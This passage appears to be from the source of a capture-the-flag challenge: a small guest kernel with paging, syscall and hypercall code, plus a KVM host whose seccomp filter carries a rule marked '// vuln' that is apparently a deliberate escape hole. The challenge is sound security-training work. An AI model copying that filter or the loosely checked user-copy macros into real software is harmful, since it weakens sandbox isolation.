|| !(pml4[idx[0]] & PDE64_USER)) 102 | return 0; // user_page must in 0x0000000000 ~ 0x7fffffffff 103 | 104 | pdpt_phys = pml4[idx[0]] & ~0xfff; 105 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 106 | if(!(pdpt[idx[1]] & PDE64_PRESENT)){ 107 | mappable = ((idx[1]+1)<<30) - vaddr; 108 | goto next; 109 | } 110 | if(!(pdpt[idx[1]] & PDE64_USER)) 111 | return 0; 112 | 113 | pd_phys = pdpt[idx[1]] & ~0xfff; 114 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 115 | if(!(pd[idx[2]] & PDE64_PRESENT)){ 116 | mappable = ((idx[2]+1)<<21) - vaddr; 117 | goto next; 118 | } 119 | if(!(pd[idx[2]] & PDE64_USER)) 120 | return 0; 121 | 122 | uint16_t pages = length>>12; 123 | if(pages > 512-idx[3]) 124 | pages = 512-idx[3]; 125 | 126 | pt_phys = pd[idx[2]] & ~0xfff; 127 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 128 | for(int i = 0; i < pages; i++){ 129 | if(pt[idx[3]+i] & PDE64_PRESENT) 130 | goto end; 131 | mappable += 1<<12; 132 | } 133 | 134 | next: 135 | if(mappable < length) 136 | mappable += mappable_size(vaddr+mappable, length-mappable); 137 | 138 | end: 139 | return mappable; 140 | } 141 | 142 | static uint64_t do_mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot){ 143 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 144 | uint64_t *pml4, *pdpt, *pd, *pt; 145 | 146 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 147 | uint64_t ret = -1; 148 | 149 | uint16_t pages = length>>12; 150 | uint16_t remain = 0; 151 | if(pages > 512-idx[3]){ 152 | remain = pages - (512-idx[3]); 153 | pages = 512-idx[3]; 154 | } 155 | 156 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 157 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 158 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)){ 159 | ret= -1; // user_page must in 0x0000000000 ~ 0x7fffffffff 160 | goto end; 161 | } 162 | 163 | pdpt_phys = pml4[idx[0]] & ~0xfff; 164 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 165 | if(!(pdpt[idx[1]] & PDE64_PRESENT)) 166 | goto new_pd; 167 | if(!(pdpt[idx[1]] & PDE64_USER)){ 168 | ret= -1; 169 | goto end; 170 | } 171 | 172 | pd_phys = pdpt[idx[1]] & ~0xfff; 173 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 174 | if(!(pd[idx[2]] & PDE64_PRESENT)) 175 | goto new_pt; 176 | if(!(pd[idx[2]] & PDE64_USER)){ 177 | ret= -1; 178 | goto end; 179 | } 180 | 181 | pt_phys = pd[idx[2]] & ~0xfff; 182 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 183 | for(int i = 0; i < pages; i++) 184 | if(pt[idx[3]+i] & PDE64_PRESENT){ 185 | ret= -1; 186 | goto end; 187 | } 188 | goto new_page; 189 | 190 | new_pd: 191 | if((pd_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 192 | return -1; 193 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 194 | pdpt[idx[1]] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_phys; 195 | 196 | new_pt: 197 | if((pt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 198 | return -1; 199 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 200 | pd[idx[2]] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pt_phys; 201 | 202 | new_page: 203 | for(int i = 0; i < pages; i++) 204 | pt[idx[3]+i] = PDE64_PRESENT | (prot & PROT_WRITE ? PDE64_RW : 0) | \ 205 | (prot & (PROT_READ | PROT_WRITE) ? PDE64_USER : 0) | (paddr+(i<<12)); 206 | 207 | if(remain > 0) 208 | if(do_mmap_in_user(vaddr+(pages<<12), paddr+(pages<<12), remain<<12, prot) != vaddr+(pages<<12)){ 209 | for(int i = 0; i < pages; i++) 210 | pt[idx[3]+i] = 0; 211 | return -1; 212 | } 213 | 214 | if(vaddr+(pages<<12) == map_bottom) 215 | map_bottom = vaddr; 216 | ret = vaddr; 217 | end: 218 | return ret; 219 | } 220 | 221 | uint64_t mprotect_user(uint64_t vaddr, size_t length, int prot){ 222 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 223 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 224 | uint64_t *pml4, *pdpt, *pd, *pt; 225 | 226 | if(vaddr&0xfff || length&0xfff) 227 | return -1; 228 | 229 | uint16_t pages = length>>12; 230 | uint16_t remain = 0; 231 | if(pages > 512-idx[3]){ 232 | remain = pages - (512-idx[3]); 233 | pages = 512-idx[3]; 234 | } 235 | 236 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 237 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 238 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)) 239 | return -1; 240 | 241 | pdpt_phys = pml4[idx[0]] & ~0xfff; 242 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 243 | if(!(pdpt[idx[1]] & PDE64_PRESENT) || !(pdpt[idx[1]] & PDE64_USER)) 244 | return -1; 245 | 246 | pd_phys = pdpt[idx[1]] & ~0xfff; 247 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 248 | if(!(pd[idx[2]] & PDE64_PRESENT) || !(pd[idx[2]] & PDE64_USER)) 249 | return -1; 250 | 251 | pt_phys = pd[idx[2]] & ~0xfff; 252 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 253 | for(int i = 0; i < pages; i++) 254 | if(!(pt[idx[3]+i] & PDE64_PRESENT)) 255 | return -1; 256 | 257 | for(int i = 0; i < pages; i++){ 258 | uint64_t page_phys = pt[idx[3]+i] & ~((1<<9)-1); 259 | 260 | pt[idx[3]+i] = PDE64_PRESENT | (prot & PROT_WRITE ? PDE64_RW : 0) | \ 261 | (prot & (PROT_READ | PROT_WRITE) ? PDE64_USER : 0) | page_phys; 262 | } 263 | 264 | if(remain > 0) 265 | if(mprotect_user(vaddr+(pages<<12), remain<<12, prot) == -1) 266 | return -1; 267 | 268 | return 0; 269 | } 270 | 271 | uint64_t munmap_user(uint64_t vaddr, size_t length){ 272 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 273 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 274 | uint64_t *pml4, *pdpt, *pd, *pt; 275 | 276 | if(vaddr&0xfff || length&0xfff) 277 | return -1; 278 | 279 | uint16_t pages = length>>12; 280 | uint16_t remain = 0; 281 | if(pages > 512-idx[3]){ 282 | remain = pages - (512-idx[3]); 283 | pages = 512-idx[3]; 284 | } 285 | 286 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 287 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 288 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)) 289 | return -1; 290 | 291 | pdpt_phys = pml4[idx[0]] & ~0xfff; 292 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 293 | if(!(pdpt[idx[1]] & PDE64_PRESENT) || !(pdpt[idx[1]] & PDE64_USER)) 294 | return -1; 295 | 296 | pd_phys = pdpt[idx[1]] & ~0xfff; 297 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 298 | if(!(pd[idx[2]] & PDE64_PRESENT) || !(pd[idx[2]] & PDE64_USER)) 299 | return -1; 300 | 301 | pt_phys = pd[idx[2]] & ~0xfff; 302 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 303 | for(int i = 0; i < pages; i++) 304 | if(!(pt[idx[3]+i] & PDE64_PRESENT)) 305 | return -1; 306 | 307 | for(int i = 0; i < pages; i++){ 308 | uint64_t page_phys = pt[idx[3]+i] & ~((1<<9)-1); 309 | hc_free((void*)page_phys, 0x1000); 310 | 311 | pt[idx[3]+i] = 0; 312 | } 313 | 314 | if(remain > 0) 315 | if(munmap_user(vaddr+(pages<<12), remain<<12) == -1) 316 | return -1; 317 | 318 | if(vaddr == map_bottom) 319 | map_bottom += length; 320 | 321 | return 0; 322 | } 323 | -------------------------------------------------------------------------------- /kernel/memory/usermem.h: -------------------------------------------------------------------------------- 1 | #ifndef _USERMEM_H 2 | #define _USERMEM_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #define copy_to_user(dst, src, size) (((dst) < (1UL<<39)-1) ? (uint64_t)memcpy((void*)dst, src, size) : -1) 9 | #define copy_from_user(dst, src, size) (((src) < (1UL<<39)-1) ? memcpy(dst, (void*)src, size) : (void*)-1) 10 | 11 | uint64_t brk; 12 | 13 | int prepare_user(void); 14 | uint64_t mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot); 15 | uint64_t mmap_user(uint64_t vaddr, size_t length, int prot); 16 | uint64_t mprotect_user(uint64_t vaddr, size_t length, int prot); 17 | uint64_t munmap_user(uint64_t vaddr, size_t length); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /kernel/service/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := service.a 2 | 3 | include ../template.mk 4 | 5 | ifndef CTF_FLAG1 6 | CTF_FLAG1 := XXXXX{1111111111111111111111111111111} 7 | endif 8 | 9 | syscall.o: syscall.c 10 | $(CC) $(CFLAGS) -c -MMD -MP $< -DFLAG1=\"$(CTF_FLAG1)\" 11 | -------------------------------------------------------------------------------- /kernel/service/hypercall.h: -------------------------------------------------------------------------------- 1 | #ifndef _HYPERCALL_H 2 | #define _HYPERCALL_H 3 | 4 | unsigned int hc_read(void *buf, unsigned long size, int user); 5 | unsigned int hc_write(void *buf, unsigned long size, int user); 6 | 7 | unsigned int hc_mem_inuse(void); 8 | unsigned int hc_mem_total(void); 9 | void *hc_malloc(void *addr, unsigned long size); 10 | int hc_free(void *addr, unsigned long size); 11 | 12 | void *hc_load_module(void *addr, unsigned long offset, unsigned long size); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /kernel/service/hypercall.s: -------------------------------------------------------------------------------- 1 | global hc_read, hc_write 2 | global hc_mem_inuse, hc_mem_total, hc_malloc, hc_free 3 | global hc_load_module 4 | 5 | hc_read: 6 | mov rax, 0x10 7 | mov rbx, rdi 8 | mov rcx, rsi 9 | vmmcall 10 | ret 11 | 12 | hc_write: 13 | mov rax, 0x11 14 | mov rbx, rdi 15 | mov rcx, rsi 16 | vmmcall 17 | ret 18 | 19 | hc_mem_total: 20 | mov rax, 0x20 21 | mov rbx, 1 22 | vmmcall 23 | ret 24 | 25 | hc_mem_inuse: 26 | mov rax, 0x20 27 | mov rbx, 2 28 | vmmcall 29 | ret 30 | 31 | hc_malloc: 32 | mov rax, 0x21 33 | mov rbx, rdi 34 | mov rcx, rsi 35 | vmmcall 36 | ret 37 | 38 | hc_free: 39 | mov rax, 0x22 40 | mov rbx, rdi 41 | mov rcx, rsi 42 | vmmcall 43 | ret 44 | 45 | hc_load_module: 46 | mov rax, 0x30 47 | mov rbx, 1 48 | mov rcx, rdi 49 | xchg rdx, rsi 50 | vmmcall 51 | ret 52 | -------------------------------------------------------------------------------- /kernel/service/switch.h: -------------------------------------------------------------------------------- 1 | #ifndef _SWITCH_H 2 | #define _SWITCH_H 3 | 4 | void set_handler(void* func); 5 | void switch_user(uint64_t rip, uint64_t rsp); 6 | void syscall_handler(void); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /kernel/service/switch.s: -------------------------------------------------------------------------------- 1 | global set_handler, switch_user, syscall_handler 2 | extern syscall 3 | extern kernel_stack 4 | 5 | set_handler: 6 | xor rax, rax 7 | mov rdx, 0x00200010 8 | mov ecx, 0xc0000081 9 | wrmsr 10 | 11 | mov rax, rdi 12 | mov rdx, 0x80 13 | mov ecx, 0xc0000082 14 | wrmsr 15 | 16 | ret 17 | 18 | switch_user: 19 | cli 20 | mov [rel + kernel_stack], rsp 21 | mov ax, 0x2b 22 | mov ds, eax 23 | push 0x2b ; ss 24 | push rsi ; stack 25 | pushfq ; rflags 26 | or qword [rsp], 0x200 27 | push 0x23 ; cs 28 | push rdi ; rip 29 | xor rax, rax 30 | xor rcx, rcx 31 | xor rdx, rdx 32 | xor rbx, rbx 33 | xor rsi, rsi 34 | xor rdi, rdi 35 | xor rbp, rbp 36 | xor r8, r8 37 | xor r9, r9 38 | xor r10, r10 39 | xor r11, r11 40 | xor r12, r12 41 | xor r13, r13 42 | xor r14, r14 43 | xor r15, r15 44 | iretq 45 | 46 | syscall_handler: 47 | mov r12, rsp 48 | mov rsp, [rel + kernel_stack] 49 | 50 | push rax 51 | call get_usercs 52 | mov r13, rax 53 | pop rax 54 | 55 | push r13 ; ss 56 | push r12 ; rsp 57 | push r11 ; rflags 58 | push r13 ; cs 59 | push rcx ; rip 60 | 61 | add word [rsp+0x8], 3 ; cs 62 | add word [rsp+0x20], 0xb ; ss 63 | 64 | push rbx 65 | push rsi 66 | push rdi 67 | push rbp 68 | mov rbp, rsp 69 | 70 | push r9 71 | push r8 72 | push r10 73 | push rdx 74 | push rsi 75 | push rdi 76 | mov rsi, rsp 77 | mov rdi, rax 78 | 79 | mov bx, ds 80 | push bx 81 | mov bx, ss 82 | mov ds, bx 83 | 84 | call syscall 85 | 86 | pop bx 87 | mov ds, bx 88 | 89 | leave 90 | pop rdi 91 | pop rsi 92 | pop rbx 93 | iretq 94 | 95 | get_usercs: 96 | push rcx 97 | push rdx 98 | mov ecx, 0xc0000081 99 | rdmsr 100 | shr edx, 0x10 101 | mov rax, rdx 102 | pop rdx 103 | pop rcx 104 | ret 105 | -------------------------------------------------------------------------------- /kernel/service/syscall.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "service/hypercall.h" 6 | #include "memory/usermem.h" 7 | #include "utils/misc.h" 8 | 9 | #define NR_read 0 10 | #define NR_write 1 11 | 12 | #define NR_mmap 9 13 | #define NR_mprotect 10 14 | #define NR_munmap 11 15 | #define NR_brk 12 16 | 17 | #define NR_exit 60 18 | 19 | #define NR_getflag 4296 20 | 21 | ssize_t sys_read(int fd, uint64_t buf, size_t count); 22 | ssize_t sys_write(int fd, uint64_t buf, size_t count); 23 | uint64_t sys_mmap(uint64_t addr, size_t length, int prot, int flags, int fd, off_t offset); 24 | uint64_t sys_mprotect(uint64_t addr, size_t length, int prot); 25 | int sys_munmap(uint64_t addr, size_t length); 26 | int sys_brk(uint64_t addr); 27 | void sys_exit(int status); 28 | uint64_t sys_getflag(void); 29 | 30 | uint64_t syscall(uint64_t nr, uint64_t argv[]){ 31 | uint64_t ret = -1; 32 | 33 | switch(nr){ 34 | case NR_read: 35 | ret = sys_read(argv[0], argv[1], argv[2]); 36 | break; 37 | case NR_write: 38 | ret = sys_write(argv[0], argv[1], argv[2]); 39 | break; 40 | case NR_mmap: 41 | ret = sys_mmap(argv[0], argv[1], argv[2], argv[3], argv[4], argv[5]); 42 | break; 43 | case NR_mprotect: 44 | ret = sys_mprotect(argv[0], argv[1], argv[2]); 45 | break; 46 | case NR_munmap: 47 | ret = sys_munmap(argv[0], argv[1]); 48 | break; 49 | case NR_brk: 50 | ret = sys_brk(argv[0]); 51 | break; 52 | case NR_exit: 53 | sys_exit(argv[0]); 54 | break; 55 | case NR_getflag: 56 | ret = sys_getflag(); 57 | break; 58 | } 59 | 60 | return ret; 61 | } 62 | 63 | ssize_t sys_read(int fd, uint64_t buf, size_t count){ 64 | return hc_read((void*)buf, count, 1); 65 | } 66 | 67 | ssize_t sys_write(int fd, uint64_t buf, size_t count){ 68 | return hc_write((void*)buf, count, 1); 69 | } 70 | 71 | uint64_t sys_mmap(uint64_t addr, size_t length, int prot, int flags, int fd, off_t offset){ 72 | return mmap_user(addr, length, prot); 73 | } 74 | 75 | uint64_t sys_mprotect(uint64_t addr, size_t length, int prot){ 76 | return mprotect_user(addr, length, prot); 77 | } 78 | 79 | int sys_munmap(uint64_t addr, size_t length){ 80 | return munmap_user(addr, length); 81 | } 82 | 83 | int sys_brk(uint64_t addr){ 84 | if(!addr) 85 | return brk; 86 | 87 | if(addr > brk){ 88 | if(mmap_user(brk, addr-brk, PROT_READ | PROT_WRITE) < 0) 89 | return -1; 90 | } 91 | else{ 92 | if(munmap_user(addr, brk-addr) < 0) 93 | return -1; 94 | } 95 | 96 | brk = addr; 97 | return 0; 98 | } 99 | 100 | void sys_exit(int status){ 101 | hlt(); 102 | } 103 | 104 | uint64_t sys_getflag(void){ 105 | uint64_t addr; 106 | char flag[] = "Here is first flag : "FLAG1; 107 | 108 | addr = mmap_user(0, 0x1000, PROT_WRITE); 109 | copy_to_user(addr, flag, sizeof(flag)); 110 | mprotect_user(addr, 0x1000, PROT_NONE); 111 | 112 | return addr; 113 | } 114 | -------------------------------------------------------------------------------- /kernel/startup.s: -------------------------------------------------------------------------------- 1 | global _start, hlt 2 | extern kernel_main, kernel_stack 3 | 4 | _start: 5 | mov rax, 0x21 6 | mov rbx, 0 7 | mov rcx, 0x4000 8 | vmmcall 9 | 10 | mov rsp, rax 11 | add rsp, 0x4000 12 | mov [rel + kernel_stack], rsp 13 | call kernel_main 14 | 15 | hlt: 16 | hlt 17 | jmp hlt 18 | -------------------------------------------------------------------------------- /kernel/template.mk: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | CSRCS := $(wildcard *.c) 4 | SSRCS := $(wildcard *.s) 5 | OBJS := $(SSRCS:.s=.o) $(CSRCS:.c=.o) 6 | DEPS := $(CSRCS:.c=.d) 7 | 8 | ifndef CFLAGS 9 | CFLAGS := -Wall -I.. -masm=intel -fPIE -g3 10 | endif 11 | 12 | .PHONY: all 13 | all: $(TARGET) 14 | 15 | -include $(DEPS) 16 | 17 | $(TARGET): $(OBJS) 18 | $(AR) rcs $@ $^ 19 | 20 | %.o: %.c 21 | $(CC) $(CFLAGS) -c -MMD -MP $< 22 | 23 | %.o: %.s 24 | $(AS) -f elf64 $^ 25 | 26 | .PHONY: clean 27 | clean: 28 | $(RM) $(DEPS) $(OBJS) $(TARGET) 29 | -------------------------------------------------------------------------------- /kernel/utils/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := utils.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kernel/utils/misc.h: -------------------------------------------------------------------------------- 1 | #ifndef _MISC_H 2 | #define _MISC_H 3 | 4 | void *memcpy(void *dest, const void *src, size_t n); 5 | void *memset(void *dest, const int c, size_t n); 6 | size_t strlen(const char *s); 7 | void hlt(void) __attribute__((noreturn)) ; 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /kernel/utils/misc.s: -------------------------------------------------------------------------------- 1 | global memcpy, memset, strlen 2 | 3 | memcpy: 4 | mov rcx, rdx 5 | lc: 6 | mov al, [rsi] 7 | mov [rdi], al 8 | inc rdi 9 | inc rsi 10 | loop lc 11 | mov rax, rdi 12 | sub rax, rdx 13 | ret 14 | 15 | memset: 16 | mov rcx, rdx 17 | ls: 18 | mov [rdi], sil 19 | inc rdi 20 | loop ls 21 | mov rax, rdi 22 | sub rax, rdx 23 | ret 24 | 25 | strlen: 26 | xor rcx, rcx 27 | ll: 28 | mov al, [rdi+rcx] 29 | inc rcx 30 | test al, al 31 | jne ll 32 | lea rax, [rcx-1] 33 | ret 34 | -------------------------------------------------------------------------------- /kvm/.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.gitignore 3 | 4 | *.txt 5 | *.swp 6 | 7 | *.elf 8 | *.bin 9 | *.a 10 | *.o 11 | *.d 12 | -------------------------------------------------------------------------------- /kvm/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := kvm.elf 2 | SRCS := main.c 3 | 4 | OBJS := $(SRCS:.c=.o) 5 | DEPS := $(SRCS:.c=.d) 6 | SUB_OBJS := vm/vm.a utils/utils.a 7 | CFLAGS := -Wall -Wl,-z,relro,-z,now -fstack-protector -I.. -g3 8 | 9 | export CFLAGS 10 | 11 | .PHONY: all 12 | all: $(TARGET) 13 | 14 | $(TARGET): $(OBJS) $(SUB_OBJS) 15 | $(CC) $^ -o $@ 16 | 17 | %.o: %.c 18 | $(CC) $(CFLAGS) -c -MMD -MP $< 19 | 20 | $(SUB_OBJS): FORCE 21 | $(MAKE) -C $(dir $@) $(notdir $@) 22 | 23 | .PHONY: clean 24 | clean: 25 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 26 | $(RM) $(DEPS) $(OBJS) $(TARGET) 27 | 28 | FORCE: 29 | -------------------------------------------------------------------------------- /kvm/bits.h: -------------------------------------------------------------------------------- 1 | #ifndef _BITS_H 2 | #define _BITS_H 3 | 4 | /* CR0 bits */ 5 | #define CR0_PE 1u 6 | #define CR0_MP (1U << 1) 7 | #define CR0_EM (1U << 2) 8 | #define CR0_TS (1U << 3) 9 | #define CR0_ET (1U << 4) 10 | #define CR0_NE (1U << 5) 11 | #define CR0_WP (1U << 16) 12 | #define CR0_AM (1U << 18) 13 | #define CR0_NW (1U << 29) 14 | #define CR0_CD (1U << 30) 15 | #define CR0_PG (1U << 31) 16 | 17 | /* CR4 bits */ 18 | #define CR4_VME 1 19 | #define CR4_PVI (1U << 1) 20 | #define CR4_TSD (1U << 2) 21 | #define CR4_DE (1U << 3) 22 | #define CR4_PSE (1U << 4) 23 | #define CR4_PAE (1U << 5) 24 | #define CR4_MCE (1U << 6) 25 | #define CR4_PGE (1U << 7) 26 | #define CR4_PCE (1U << 8) 27 | #define CR4_OSFXSR (1U << 8) 28 | #define CR4_OSXMMEXCPT (1U << 10) 29 | #define CR4_UMIP (1U << 11) 30 | #define CR4_VMXE (1U << 13) 31 | #define CR4_SMXE (1U << 14) 32 | #define CR4_FSGSBASE (1U << 16) 33 | #define CR4_PCIDE (1U << 17) 34 | #define CR4_OSXSAVE (1U << 18) 35 | #define CR4_SMEP (1U << 20) 36 | #define CR4_SMAP (1U << 21) 37 | 38 | #define EFER_SCE 1 39 | #define EFER_LME (1U << 8) 40 | #define EFER_LMA (1U << 10) 41 | #define EFER_NXE (1U << 11) 42 | 43 | /* 64-bit page * entry bits */ 44 | #define PDE64_PRESENT 1 45 | #define PDE64_RW (1U << 1) 46 | #define PDE64_USER (1U << 2) 47 | #define PDE64_ACCESSED (1U << 5) 48 | #define PDE64_DIRTY (1U << 6) 49 | #define PDE64_PS (1U << 7) 50 | #define PDE64_G (1U << 8) 51 | #define PDE64_NX (1UL << 63) 52 | 53 | #endif 54 | -------------------------------------------------------------------------------- /kvm/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "vm/vm.h" 5 | #include "utils/module.h" 6 | 7 | #define GUEST_MEMSIZE 0x400000 8 | 9 | __attribute__((constructor)) 10 | void init(void){ 11 | setbuf(stdout, NULL); 12 | } 13 | 14 | static int set_seccomp(int maxfd); 15 | 16 | int main(int argc, char *argv[]){ 17 | struct vm *vm; 18 | unsigned long entry; 19 | int nmod; 20 | char **mods; 21 | int fds; 22 | 23 | if((fds = open("/dev/null", O_RDONLY)) < 0) 24 | fds = 3; 25 | else 26 | close(fds); 27 | 28 | if(argc < 2){ 29 | char *arg[] = {"kernel.bin"}; 30 | nmod = 1; 31 | mods = arg; 32 | } 33 | else { 34 | nmod = argc-1; 35 | mods = argv+1; 36 | } 37 | init_modules(nmod, mods); 38 | 39 | if(!(vm = init_vm(1, GUEST_MEMSIZE))) 40 | return -1; 41 | if((entry = load_kernel(vm)) & 0xfff) 42 | return -1; 43 | 44 | if(set_seccomp(fds+nmod+3)) 45 | return -1; 46 | 47 | run_vm(vm, 0, entry); 48 | 49 | fini_modules(); 50 | return 0; 51 | } 52 | 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | #include 59 | 60 | static int set_seccomp(int maxfd){ 61 | struct sock_filter filter[] = { 62 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))), 63 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0), 64 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 65 | 66 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), 67 | 68 | BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, __X32_SYSCALL_BIT, 0, 1), 69 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 70 | 71 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_read, 0, 1), 72 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 73 | 74 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 0, 1), 75 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 76 | 77 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_close, 0, 1), 78 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 79 | 80 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_lseek, 0, 1), 81 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 82 | 83 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_brk, 0, 1), 84 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 85 | 86 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 0, 1), 87 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 88 | 89 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 1), // vuln 90 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, args[1]))), 91 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, KVM_CREATE_VM, 5, 0), 92 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, KVM_CREATE_VCPU, 4, 0), 93 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, args[0]))), 94 | BPF_STMT(BPF_ALU | BPF_AND | BPF_K, 0xff), 95 | BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, maxfd, 1, 0), 96 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 97 | 98 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 99 | }; 100 | 101 | struct sock_fprog prog = { 102 | .len = (unsigned short) (sizeof(filter) / sizeof(struct sock_filter)), 103 | .filter = filter, 104 | }; 105 | 106 | if(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) { 107 | perror("prctl PR_SET_NO_NEW_PRIVS"); 108 | return -1; 109 | } 110 | 111 | if(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)){ 112 | perror("prctl PR_SET_SECCOMP"); 113 | return -1; 114 | } 115 | 116 | return 0; 117 | } 118 | -------------------------------------------------------------------------------- /kvm/template.mk: -------------------------------------------------------------------------------- 1 | SRCS := $(wildcard *.c) 2 | OBJS := $(SRCS:.c=.o) 3 | DEPS := $(SRCS:.c=.d) 4 | 5 | ifndef CFLAGS 6 | CFLAGS := -Wall -L.. -g3 7 | endif 8 | 9 | .PHONY: all 10 | all: $(TARGET) 11 | 12 | -include $(DEPS) 13 | 14 | $(TARGET): $(OBJS) 15 | $(AR) rcs $@ $^ 16 | 17 | %.o: %.c 18 | $(CC) $(CFLAGS) -c -MMD -MP $< 19 | 20 | .PHONY: clean 21 | clean: 22 | $(RM) $(DEPS) $(OBJS) $(TARGET) 23 | -------------------------------------------------------------------------------- /kvm/utils/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := utils.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kvm/utils/debug.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define DEBUG_PRINT(...) fprintf(stderr, __VA_ARGS__) 7 | 8 | #define dump_segment_register(n, s) \ 9 | DEBUG_PRINT("%3s base=%016llx limit=%08x selector=%04x type=%02x dpl=%d db=%d l=%d g=%d avl=%d\n", \ 10 | (n), (s)->base, (s)->limit, (s)->selector, (s)->type, (s)->dpl, (s)->db, (s)->l, (s)->g, (s)->avl ) 11 | #define dump_dtable(n, s) \ 12 | DEBUG_PRINT("%3s base=%016llx limit=%04x \n", (n), (s)->base, (s)->limit) 13 | 14 | void dump_regs(int vcpufd){ 15 | int r; 16 | 17 | struct kvm_regs regs; 18 | r = ioctl(vcpufd, KVM_GET_REGS, ®s); 19 | assert(r != -1); 20 | 21 | DEBUG_PRINT("\n\nDump regs\n"); 22 | DEBUG_PRINT("rax=%016llx rbx=%016llx rcx=%016llx rdx=%016llx\n", 23 | regs.rax, regs.rbx, regs.rcx, regs.rdx); 24 | DEBUG_PRINT("rsi=%016llx rdi=%016llx rsp=%016llx rbp=%016llx\n", 25 | regs.rsi, regs.rdi, regs.rsp, regs.rbp); 26 | DEBUG_PRINT("r8 =%016llx r9 =%016llx r10=%016llx r11=%016llx\n", 27 | regs.r8, regs.r9, regs.r10, regs.r11); 28 | 